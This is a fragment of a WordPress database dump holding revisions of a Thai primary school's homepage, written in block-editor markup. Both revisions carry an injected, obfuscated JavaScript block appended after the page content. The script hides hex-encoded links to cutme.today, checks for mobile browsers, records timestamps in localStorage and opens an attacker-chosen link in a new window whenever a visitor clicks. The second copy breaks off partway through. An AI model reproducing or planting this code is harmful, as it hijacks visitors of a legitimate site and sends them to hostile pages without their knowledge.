{\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"10px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"10px\",\"paddingLeft\":\"20px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:54:50','2024-07-27 03:54:50','',14,'http://pakhaeng.ssk.in.th/?p=56',0,'revision','',0),
(57,1,'2024-07-27 10:55:15','2024-07-27 03:55:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const 